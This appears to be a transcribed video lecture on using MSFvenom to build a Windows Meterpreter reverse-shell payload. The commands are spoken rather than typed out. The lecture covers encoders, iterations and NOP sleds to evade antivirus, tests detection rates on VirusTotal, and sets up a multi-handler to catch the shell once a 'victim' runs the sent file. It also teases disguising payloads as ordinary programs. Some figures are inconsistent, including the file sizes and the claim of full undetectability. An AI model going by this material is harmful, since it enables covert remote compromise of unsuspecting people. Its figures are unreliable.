Hello and welcome back everyone. Let's continue our discussion on how to create a payload using MSFvenom. In the previous videos or lectures we have discussed how can we create .exe extension payloads for Windows. But we have more options in MSFvenom and we are going to explore all those venoms, all those types of payloads in this lecture, and also we are going to test our payloads if they are stealthy enough to bypass some antivirus versions, antivirus vendors or antivirus detections. We can also reduce the size of these payloads. Also we can increase their size as well. We can add some icons and we can customize these payloads according to our use as well. And to see all the available options that MSFvenom provides us, we can just simply type MSFvenom-h command in our terminal. So let's begin with the lecture. So as we are in our desktop, we are opening the terminal right here, and now I will type MSFvenom to launch our MSFvenom, and as you can see we have some options right here like always, and without even using the command MSFvenom-h for help, we can simply just use this command also. Like even if we type MSFvenom-h, it will give the same result that normal MSFvenom command does. So as we can see here, we have some more options here. So as you can see, we have a -f option which we have used earlier, that is format option, and we have used a .exe format, and as I have told you that in this lecture we are going to use some more types of format for creating payloads. So what you can do to know what payload, what types of format this MSFvenom supports, you can just use this command, that is --list formats, so we can list all the format that MSFvenom supports. So let's just try this command, and we will type MSFvenom then --list and we will type format. So once we enter this command, it will take a bit of time in loading, and as it has loaded, you can see the name of extensions supported by MSFvenom, and if we scroll a little bit up, you can see the framework executable format supported by this MSFvenom. Here we can see exe that we have already used. We can also see DLL, access2, ASP. Also we have JAR extension here as well. Not only that, we can use formats like base64, C, C#, dword, Go, Golang, even Java is supported here. Also Perl extension is also supported here, and PowerShell is also supported here. And if we want to create a Python payload, we can use just this Python extension here to create a payload that supports Python. By creating different payloads, we can just simply bypass some antivirus detection, because if we use Python extension, not the .exe, many Windows system doesn't have Python installed already. So if we will use exe, it is more likely to get caught. But if we are using Python and we know that our victim has Python installed in his Windows system, we can use this extension, create a payload over it and send to him. Also, once we create our payloads, we can check how many antivirus vendors it is bypassing. So for that, just open our Firefox web browser, and here we will type VirusTotal, go to the home directory, and on this VirusTotal website you can upload your file of your payload, and once you upload the file of your payload here, you can check how many antiviruses it is bypassing and how many antivirus can detect it. And it can be a very useful and very essential tool for us if we want to check that our payload is bypassing antiviruses or not. So let's just quickly make a payload here, and we will upload that payload on VirusTotal website. Also, just for additional information, I must tell you that if you create your own payload and upload it on VirusTotal, there might be possibilities that that payload, if it is undetectable today, it won't be undetectable tomorrow, because this VirusTotal website sends these payloads to antivirus vendors to improve their security as well. So if you are creating a payload today, there is high possibilities that the next day or the next week your payload will be completely useless. So let's just create a payload right away and test if it is detectable or not. So here we will just type MSFvenom, and we know from the previous video how we can create a payload. So we will just type MSFvenom -p. We will type Windows. We are going for 64-bit operating system, and then we will choose Meterpreter, reverse shell, and we will set our local host, that is 192.168.29.17 I guess, and we will set a local port to listen, that will be 444, and then we will decide the format of our payload, that will be exe by using -f command, and then we will use -o command to save this file, and we will use payload1.exe, or we will just type payload test.exe, and once we hit enter, this payload is created, and as you can see, the file size of this payload is 7 MB, or you can say 7164 bytes. So let's just go back to the VirusTotal website, and we will choose files here, and as you can see, we have a exe file here, that is payload.exe, and we will select and we will upload here and confirm upload, and it is uploading on the website. Now since it's scanning our payload, let's create another payload here, and this time we will use some different format and some different things to make our payload more stealthier and less detectable. So this time we will go with the same approach here, but we will do some little modification here. In the -f we will use -a for architecture, and architecture will be 64 bits, and then we will use -e command, that is for encoders. And to check what are encoders, let's open another terminal here, and if we type MSFvenom, we can see here that so encoders are just used to make our payload more stealthier and less detectable to these antivirus software, and it will create a bypass route for us. So we are going to use this encoder, and we can also list all these encoders. So let's just type MSFvenom --list, type encoder, and as we can see, we have multiple encoders here for 86-bit architecture, for PHP, for CMD, and for a lot of, but what encoder we are going to use is this Zuto-Dekiru, that is for x64 architecture. So we will just copy it here, and we will go back to our terminal, and we will type, so here we will just simply paste that selection, and then we will use -i, and -i is for iteration that we are setting to 5. And if we go back to that terminal and see what iteration is, so it says the number of time it encodes a payload. So if we increase the number of encoding or iteration, it increases the size, but the advantage here is the more the size is and the more iteration it do, it will become more undetectable. So the next thing we are going to type here is --platform, and our platform is none other than Windows, and then we are going to use a command -n, and if you want to check what -n stands for, so if we go here, it says NOPSLED. Now we know what NOPSLED stands for. NOPSLED mean no operations lead. So just go back to the terminal, and we will select it as 500 no operations, and then we will just simply give it a name, and we will use name as testpayload.exe, and as we hit enter, you can see it took a lot of time because of the iterations, and its size is 1777 bits, and it is saved as testpayload.exe. Now if we go back to our Firefox, we can see the previous payload of size 7 KB is detectable by 56 vendors out of 71. So remember this number, it is 56, and it is a lot of number. So now let's open another tab, and we will check and we will compare our newly made payload with our previous one. So we will just select here, choose file, and this is our new payload. So we will just upload it here, confirm upload, and it is uploading, and we will wait till it's get its final analysis. So as we can see in the numbers, our newest payload is undetected by all top 55 antivirus vendors. Even as CrowdStrike Falcon couldn't identify our payload. So this payload is completely undetectable. Now let me tell you how you can use this payload. So if if we go back to our terminal and just go to MSF console, and let's start the MSF console here. So now so that I can tell you how you can use this tool. So once you have created a payload that looks like this one, you can just simply send this payload to your target, or you can do it on your own machine as well. And then after that, what you have to do is just type use exploit multi-handler and go in the options, set lhost to your Kali Linux machine, that is 192.168.29.178, and then you would just wait till your victim opens or executes that file. And once he opens that file, you just have to type run, and once he executes the file, you will get the Metasploit access on your terminal. And as you can see, we didn't change our payload here, so be cautious that you change your payload according to your need. We used Metasploit reverse TCP, so you should change to Metasploit reverse TCP as well, as it is set to generic shell. So this was the lecture on the advanced use of MSFvenom that is based on our Metasploit framework, and in the next video I will teach you how you can insert a payload that looks like a day-to-day exe file, for example Spotify.